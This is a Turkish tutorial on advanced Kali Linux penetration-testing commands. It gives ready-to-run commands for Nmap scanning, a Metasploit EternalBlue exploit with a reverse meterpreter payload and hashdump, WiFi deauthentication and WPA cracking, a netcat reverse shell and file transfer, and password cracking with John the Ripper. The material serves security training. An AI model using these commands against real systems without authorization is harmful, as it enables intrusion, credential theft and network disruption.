Hackerların tercih ettiği işletim sistemi olan Kali Linux, sistemleri test etmek ve güvenliğini sağlamak için birçok araç ve komut sunar. Temel komutlar yaygın olarak bilinse de, gelişmiş komutlarda uzmanlaşmak hacking ve sızma testlerinde performansınızı önemli ölçüde artırabilir.
Nmap, bir bilgisayar ağındaki ana bilgisayarları ve hizmetleri keşfetmek ve böylece ağın bir “haritasını” oluşturmak için kullanılan güçlü bir ağ tarama aracıdır.
Belirli bir aralıktaki açık portları tespit edin:
Nmap betikleri (NSE) ile güvenlik açıklarını tarama:
IPv6 Ağ Taraması:
Metasploit, hedef makinelere karşı exploit geliştirmek, test etmek ve çalıştırmak için sağlam bir çerçevedir.
Bir exploit yapılandırın ve çalıştırın:
Post-exploitation modüllerini çalıştırma:
Aircrack-ng, WiFi ağ güvenliğini değerlendirmek için bir araç paketidir. WEP ve WPA-PSK anahtarlarının kırılmasına izin verir.
Kimlik doğrulama saldırısı:
WPA handshake'i kırma:
Netcat (genellikle nc olarak kısaltılır), TCP veya UDP kullanarak ağ bağlantılarından okuyabilen ve ağ bağlantılarına yazabilen çok yönlü bir ağ aracıdır.
Reverse shell oluşturma:
Dosyalar aktarma:
Burp Suite, web uygulama güvenliğini test etmek için kapsamlı bir platformdur.
Fuzzing için Intruder:
Manuel test için Repeater:
John the Ripper, öncelikle zayıf şifreleri belirlemek için kullanılan hızlı bir şifre kırma aracıdır.
Artımlı kaba kuvvet saldırısı:
Kırılmış parolaları gösterir:
1. Nmap: Gelişmiş Ağ Taraması
Nmap, bir bilgisayar ağındaki ana bilgisayarları ve hizmetleri keşfetmek ve böylece ağın bir “haritasını” oluşturmak için kullanılan güçlü bir ağ tarama aracıdır.
Gelişmiş Kullanım:
Agresif Tarama ile İşletim Sistemi Algılama:nmap -A -T4 target_ip
Belirli bir aralıktaki açık portları tespit edin:
nmap -p 1-65535 target_ip
Nmap betikleri (NSE) ile güvenlik açıklarını tarama:
nmap --script vuln target_ip
IPv6 Ağ Taraması:
nmap -6 target_ipv6
Açıklama:
- -A: İşletim sistemi algılamayı, sürüm algılamayı, komut dosyası taramayı ve traceroute'u etkinleştirir.
- -T4: Tarama hızını artırır.
- -p: Bir bağlantı noktası aralığı belirtir.
- --script vuln: Güvenlik açıklarını bulmak için tasarlanmış bir dizi Nmap komut dosyası çalıştırır.
- -6: IPv6 adreslerini tarar.
Kullanım Örneği:
Bu komutlar genellikle bir sızma testinin keşif aşamasında hedefin işletim sistemleri, hizmetleri ve açık bağlantı noktaları hakkında bilgi toplamak için kullanılır.2. Metasploit Framework: Gelişmiş Exploitation
Metasploit, hedef makinelere karşı exploit geliştirmek, test etmek ve çalıştırmak için sağlam bir çerçevedir.
Gelişmiş Kullanım:
Belirli bir istismarı aratın:search exploit name:ms17_010
Bir exploit yapılandırın ve çalıştırın:
use exploit/windows/smb/ms17_010_eternalblue
set RHOST target_ip
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST your_ip
exploit
Post-exploitation modüllerini çalıştırma:
use post/windows/gather/hashdump
set SESSION 1
Açıklama:
- search: Anahtar kelimelere dayalı olarak belirli açıkları bulur.
- use: Exploit modülünü seçin.
- set: Exploit için seçenekleri yapılandırır (örn. hedef IP, payload).
- exploit: Yapılandırılan exploit'i çalıştırır.
- post: Hash toplama veya yetki yükseltme gibi exploit sonrası modülleri çalıştırır.
Kullanım Örneği:
Bu komutlar, yetkisiz erişim elde etmek için exploit aşamasında ve daha fazla bilgi toplamak veya erişimi sürdürmek için post-exploitation'da kullanılır.3. Aircrack-ng: Kablosuz Ağ Saldırısı
Aircrack-ng, WiFi ağ güvenliğini değerlendirmek için bir araç paketidir. WEP ve WPA-PSK anahtarlarının kırılmasına izin verir.
Gelişmiş Kullanım:
İzleme modu ve paket yakalama:airmon-ng start wlan0
airodump-ng wlan0mon
Kimlik doğrulama saldırısı:
aireplay-ng --deauth 10 -a router_bssid -c client_mac wlan0mon
WPA handshake'i kırma:
aircrack-ng -w /path/to/wordlist.txt -b router_bssid /path/to/capture.cap
Açıklama:
- airmon-ng start wlan0: Kablosuz bağdaştırıcıyı monitör moduna geçirir.
- airodump-ng wlan0mon: Kablosuz ağdan gelen paketleri yakalar.
- aireplay-ng --deauth: Bir istemciyi yeniden bağlanmaya zorlamak için kimlik doğrulama paketleri gönderir ve WPA handshake yakalar.
- aircrack-ng -w: WPA handshake kaba kuvvetle gerçekleştirmek için bir wordlist kullanır.
Kullanım Örneği:
Bu komutlar genellikle WiFi ağlarının güvenliğini değerlendirmek için kablosuz sızma testlerinde kullanılır.4. Netcat
Netcat (genellikle nc olarak kısaltılır), TCP veya UDP kullanarak ağ bağlantılarından okuyabilen ve ağ bağlantılarına yazabilen çok yönlü bir ağ aracıdır.
Gelişmiş Kullanım:
Netcat ile port taraması:nc -zv target_ip 20-80
Reverse shell oluşturma:
nc -e /bin/bash target_ip 4444
Dosyalar aktarma:
nc -lvp 4444 > received_file
nc target_ip 4444 < file_to_send
Açıklama:
- -z: Veri göndermeden bir tarama gerçekleştirir.
- -v: Verbose modu.
- -e: Hedefe bağlandıktan sonra bir program çalıştırır (örneğin, bir shell için /bin/bash ).
- -lvp: Belirli bir bağlantı noktasını dinler ve bağlantıları bekler.
Kullanım Örneği:
Netcat port tarama, arka kapı oluşturma, dosya transferi ve banner yakalama gibi çeşitli görevler için kullanılır.5. Burp Suite: Gelişmiş Web Uygulaması Testi Aracı
Burp Suite, web uygulama güvenliğini test etmek için kapsamlı bir platformdur.
Gelişmiş Kullanım:
Bir web uygulamasını tarama:Tüm bağlantıların ve formların haritasını çıkarmak için Burp içindeki “Spider” aracını kullanın.
Fuzzing için Intruder:
Intruder modülüne istek gönderin.
Fuzzing için konumları yapılandırın (örn. parametre değerleri).
Bir payload listesi yükleyin ve saldırıyı başlatın.
Manuel test için Repeater:
Ele geçirilen herhangi bir isteği Repeater'a gönderin.
Parametreleri değiştirin ve yanıtları gözlemlemek için yeniden gönderin.
Açıklama
- Spider: Bir web uygulamasını tarama işlemini otomatikleştirir.
- Intruder: Fuzzing ve brute-forcing gibi otomatik saldırılar gerçekleştirmenizi sağlar.
- Repeater: Çeşitli senaryoları test etmek için HTTP isteklerini manuel olarak değiştirmenizi ve yeniden göndermenizi sağlar.
Kullanım Örneği:
Burp Suite, SQL Injection, XSS ve daha fazlası gibi güvenlik açıklarını belirlemek için web uygulaması penetrasyon testleri sırasında kullanılır.6. John the Ripper: Şifre Kırma
John the Ripper, öncelikle zayıf şifreleri belirlemek için kullanılan hızlı bir şifre kırma aracıdır.
Gelişmiş Kullanım:
Parola hach kırma:john --wordlist=/path/to/wordlist.txt /path/to/hashfile
Artımlı kaba kuvvet saldırısı:
john --incremental /path/to/hashfile
Kırılmış parolaları gösterir:
john --show /path/to/hashfile
Açıklama:
- --wordlist: Sözlük saldırıları için kullanılacak sözlük listesini belirtir.
- --incremental: Tüm olası kombinasyonları kullanarak bir kaba kuvvet saldırısı çalıştırır.
- --show: Kırılmış parolaları görüntüler.